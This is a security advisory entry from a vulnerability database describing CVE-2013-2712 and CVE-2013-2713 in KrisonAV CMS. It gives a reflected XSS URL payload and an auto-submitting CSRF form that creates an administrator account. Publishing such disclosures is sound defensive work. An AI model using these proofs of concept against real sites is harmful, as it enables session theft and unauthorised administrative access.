Lucene search

K
htbridgeHigh-Tech BridgeHTB23150
HistoryMar 27, 2013 - 12:00 a.m.

Multiple Vulnerabilities in KrisonAV CMS

2013-03-2700:00:00
High-Tech Bridge
www.htbridge.com
21

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.01 Low

EPSS

Percentile

81.8%

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in KrisonAV CMS, which can be exploited to perform cross-site scripting and cross-site request forgery attacks.

  1. Cross-Site Scripting (XSS) vulnerability in KrisonAV CMS: CVE-2013-2712
    The vulnerability exists due to insufficient filtration of user-supplied data passed to β€œcontent” HTTP GET parameter via β€œ/services/get_article.php” script. A remote attacker can trick a user to follow a specially crafted link and execute arbitrary HTML and script code in user’s browser in context of the vulnerable website.
    The exploitation example below uses JavaScript β€œalert()” function to display user’s cookies:
    http://[host]/services/get_article.php?content=%3Cscript%3Ealert%28document. cookie%29;%3C/script%3E

  2. Π‘ross-Site Request Forgery (CSRF) vulnerability in KrisonAV CMS: CVE-2013-2713
    The vulnerability exists due to insufficient verification of the HTTP request origin in β€œ/users_maint.html” script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a new account with administrative privileges.
    PoC (Proof-of-Concept) below will create a new account with login β€œusername” and password β€œpassword”:
    <form action=β€œhttp://[host]/users_maint.html?itemid=52&maint=1&ccsForm=users” method=β€œpost” name=β€œf1”>
    <input type=β€œhidden” name=β€œdisabledCheckBox” value=β€œ1”>
    <input type=β€œhidden” name=β€œusername” value=β€œusername”>
    <input type=β€œhidden” name=β€œpassword” value=β€œpassword”>
    <input type=β€œhidden” name=β€œgroups_index” value=β€œ20”>
    <input type=β€œhidden” name=β€œemail” value="[email protected]">
    <input type=β€œhidden” name=β€œButton_Insert” value=β€œSave”>
    <input type=β€œsubmit” id=β€œbtn”>
    </form>
    <script>
    document.f1.submit();
    </script>

CPENameOperatorVersion
krisonav cmsle3.0.1

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.01 Low

EPSS

Percentile

81.8%